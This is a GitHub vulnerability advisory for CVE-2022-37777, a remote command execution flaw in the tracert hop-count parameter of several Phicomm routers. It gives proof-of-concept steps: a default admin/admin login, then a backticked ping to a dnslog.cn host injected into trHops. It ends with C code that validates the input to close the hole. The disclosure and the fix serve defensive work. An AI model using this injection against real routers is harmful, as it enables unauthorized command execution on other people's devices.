CVE-2022-37777: Phicomm_Router/Tracert_2.md at main · SLoSnow9879/Phicomm_Router

Phicomm FIR151B A2, FIR302E A2, FIR300B A2, FIR303B A2 routers 3.0.1.17 and earlier were discovered to contain a remote command execution (RCE) vulnerability via the trHops parameter of the tracert function.


The FIR151B A2, FIR302E A2, FIR300B A2 and other routers have a remote command execution vulnerability

  1. Log in to the Feixun FIR151B A2 router with the default password admin/admin

  2. Go to system tool → system diagnosis → Tracert → IP address / domain name. The remote command execution is in the Tracert function

  3. Enter the website IP at the IP address / domain name, for example: 8.8.8.8

  4. Click Start diagnosis

  5. Intercept the request with Burp Suite, change the trHops argument to 20`ping -c 3 abcdef.r4y19h.dnslog.cn`, and forward the request

  6. Check the dnslog results: the command has been executed successfully
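The steps above work because the hop count reaches a shell unvalidated. The following is an added example, not Phicomm firmware code, showing how a tracert handler can close that path: parse trHops as a strict integer and launch the tool from an argument vector rather than a command string. The function names, the 1..255 range and the `traceroute -m` invocation are assumptions made for illustration.

```c
/* Added example: hypothetical handler helpers, not code from the router firmware. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse trHops as a plain decimal integer in 1..255 (assumed range); -1 otherwise. */
int parse_hops(const char *s)
{
    char *end;
    long v;
    if (s == NULL || !isdigit((unsigned char)s[0]))
        return -1;                 /* rejects "", " 5", "+5", "-1" */
    errno = 0;
    v = strtol(s, &end, 10);
    /* Any trailing byte (backtick, ';', '$', space) leaves *end non-NUL. */
    if (errno != 0 || *end != '\0' || v < 1 || v > 255)
        return -1;
    return (int)v;
}

/* Allow only hostname/IP characters and refuse a leading '-' (option injection). */
int valid_host(const char *h)
{
    size_t i, n;
    if (h == NULL || (n = strlen(h)) == 0 || n > 253 || h[0] == '-')
        return 0;
    for (i = 0; i < n; i++)
        if (!isalnum((unsigned char)h[i]) && !strchr(".-:", h[i]))
            return 0;
    return 1;
}

/* Build an argv for execv()-style launch, so no shell ever parses the input.
 * The hop count is re-serialised from the parsed integer, never copied raw. */
int build_tracert_argv(const char *host, const char *hops,
                       char hopbuf[12], const char *argv[5])
{
    int n = parse_hops(hops);
    if (n < 0 || !valid_host(host))
        return -1;
    snprintf(hopbuf, 12, "%d", n);
    argv[0] = "traceroute";
    argv[1] = "-m";                /* maximum hops (TTL) */
    argv[2] = hopbuf;
    argv[3] = host;
    argv[4] = NULL;
    return 0;
}
```

A handler would pass the resulting vector to `execv`/`execvp` in a child process and return an error page whenever `build_tracert_argv` fails, instead of formatting the parameters into a string for `system()` or `popen()`.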
